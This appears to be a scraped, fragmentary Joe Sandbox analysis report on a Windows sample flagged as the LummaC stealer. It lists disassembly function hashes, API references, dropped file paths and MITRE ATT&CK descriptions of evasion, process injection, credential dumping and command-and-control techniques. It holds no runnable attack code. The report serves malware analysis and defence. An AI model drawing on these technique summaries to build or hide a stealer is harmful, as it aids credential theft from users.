Instruction Fuzzy Hash: 91D05E2260822156ABA48E19F401977F7E0EA8BB11F49A55FF582E3248D234DC41C2AD

Function 004246FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00424732
GetSystemMetrics.USER32 ref: 00424741

Strings

, xrefs: 004247EC

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: edbffee6db39a61236e4c5dea3e1b076f8f8b06c10f51b6adac960acffe8eaa5
Instruction ID: 10c1b2556cd571a531e8833501c050282c00c1a1f678be513221e23e543585c2
Opcode Fuzzy Hash: edbffee6db39a61236e4c5dea3e1b076f8f8b06c10f51b6adac960acffe8eaa5
Instruction Fuzzy Hash: 1E319FB49182009FDB50EF6CD98561EBBF4BB88704F11852DE498D7361D774A988CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5_6253708004881862888.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_31b44a5562c15e927d8eb7658df48455463358c_ee039a57_67d72958-09c2-47ba-897e-02d8f04fc406\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3346.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3441.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER354C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5_6253708004881862888.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
5_6253708004881862888.exe

Function 02F7217D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 013E0AD7 Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Function 013E04B0 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 0041434A Relevance: 20.8, Strings: 16, Instructions: 780
COMMON

Function 0040A670 Relevance: 20.4, Strings: 16, Instructions: 379
COMMON

Function 0040AC10 Relevance: 19.8, APIs: 2, Strings: 9, Instructions: 595
COMMON

Function 0041C560 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 474
COMMON

Function 0040B9F0 Relevance: 11.9, Strings: 9, Instructions: 606
COMMON

Function 00413F33 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 357
COMMON

Function 00424D53 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre